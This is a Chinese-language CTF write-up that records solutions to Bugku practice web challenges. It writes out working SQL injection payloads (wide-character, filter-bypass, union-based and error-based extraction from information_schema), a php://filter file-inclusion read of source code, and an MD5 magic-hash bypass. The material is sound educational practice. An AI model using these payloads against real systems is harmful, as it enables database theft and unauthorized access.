Bugku Web题刷题记录（会持续更新）

之前web题做的不太多，现在多刷一点，写一下writeup记录一下，也方便以后复习。
sql注入
宽字符注入，题目说找key表的string字段了，so payload如下：
http://103.238.227.13:10083/?id=1%df%27unionselect string,1 from sql5.key%23
域名解析
这道题写wp的时候打不开了，不过当时做的时候只要把host改成这个ip地址就行了



sql注入2
这个题先是waf，有敏感词直接exit。但是后面有一个过滤xss的函数，会除去<....>之类的东西，所以只要在参数中的敏感词里添加<>就可以注入了。
首先爆数据库名：
http://103.238.227.13:10087/?id=1un<>ion sel<>ect database(),1%23
题目说查key表的hash字段，所以直接再查一下就拿到flag了：
http://103.238.227.13:10087/?id=1un<>ion sel<>ect hash,1 fr<>om sql3.key%23
你必须让他停下
这题也挺无聊的，bp抓包以后多go几次就出来了



本地包含
http://120.24.86.145:8003/?hello=print_r(file('test.php'))
变量1
http://120.24.86.145:8004/index1.php?args=GLOBALS
 
Web5
看源代码，直接把jsfuck丢到Consle里



头等舱
没什么意思的题，直接抓包就可以了



Web4
查看源码urldecode以后整理如下
 


直接submit"67d709b2b54aa2aa648cf6e87a7114f1"，就得到flag了
flag在Index里
用伪协议查看base64加密后的源码
http://120.24.86.145:8005/post/index.php?file=php://filter/read/convert.base64-encode/resource=index.php
解密后的源码里有flag
点击一万次
查看源代码：



在Console里让clicks为999999
然后再点一次就出flag了
备份是个好习惯
地址后添加index.php.bak可以下到源码，打开查看如下



就是找两个不相等的值md5相同，分别传参240610708和QNKCDZO，然后就可以拿到flag了
成绩单
首先获取数据库名



然后爆表名
id=0' union selectdatabase(),table_name,1,1 from information_schema.tables wheretable_schema='skctf_flag'#
爆列名
id=0' union selectdatabase(),table_name,column_name,1 from information_schema.columns wheretable_schema='skctf_flag' and table_name = 'fl4g'#
拿flag
id=0' union select skctf_flag,1,1,1from skctf_flag.fl4g#
 
秋名山老司机
其实这道题本来也挺简单的，直接写脚本获取到数值提交上去就能得到flag了，坑点是必须要在是这个页面的时候才能得到flag



所以直接照着这个页面写，多运行几次就行了，要注意cookie一致，很简单的脚本就不列出来了。
速度要快
抓包以后发现一串base64码



Base64解密并Utf-8解码以后如下



这个值每次都会变，而且要立刻提交，所以写个脚本就行了，也比较简单。
cookies欺骗
刚开始的网址是这样的：
http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=
filename拿去base64解密，是key.txt，于是尝试filename=index.php的base64码，未果，修改行号，发现出现内容，于是一行一行输出，最终得到如下代码：



根据逻辑，修改一下cookies，得到flag



多次
写这个wp的时候已经是做出来好久了，居然发现都快忘记怎么做了，看来以后做题还是应该留个记录。
第一关
首先经尝试会发现union、select等关键词会报错：



于是尝试看看是不是被过滤的，中间加个and果然不报错了：



由于回显只有一行，所以要让第一个查询变为Flase，即加上and 1=2(顺便把数据库也爆出来)



 
然后一步步尝试发现where和from都没有被过滤，or被过滤了



然后爆表名



爆列名，注意有两个



 


然后那个flag其实没什么卵用，address是第二关：



第二关



可以通过操纵id来注入，这次waf比上次厉害些，敏感词别想着过滤了。
试了一下and 1=1，发现有报错：



可以利用报错注入，首先爆数据库名：



然后爆表名：
http://120.24.86.145:9004/Once_More.php?id=1'or(select count(*)b,concat((select table_name from information_schema.tableswhere table_schema = 'web1002-2' limit 0,1),floor(rand(0)*2))a frominformation_schema.tables group by a)=(1,1)%23



 


看上去是flag2了，我们可以爆一下flag2的列名：
http://120.24.86.145:9004/Once_More.php?id=1'or(select count(*)b,concat((select column_name from information_schema.columnswhere table_schema = 'web1002-2' and table_name='flag2' limit 0,1),floor(rand(0)*2))afrom information_schema.tables group by a)=(1,1)%23



最后想拿flag，发现出现了一个问题：



这个情况表明返回的内容中有回车，substring没有用，于是尝试left，发现没问题，于是直接left就可以出结果了：
http://120.24.86.145:9004/Once_More.php?id=1%27or(select count(*)b,concat(left((select flag2 from flag2 limit0,1),40),floor(rand(0)*2))a from information_schema.tables group by a)=(1,1)%23



第三关

进来发现一张二维码……然后它提示是参数是game，flag在admin中，然而没卵用，感觉game怎么注都没反应，希望有大佬做出来指点一下吧。

初入web坑，欢迎大家互相交流~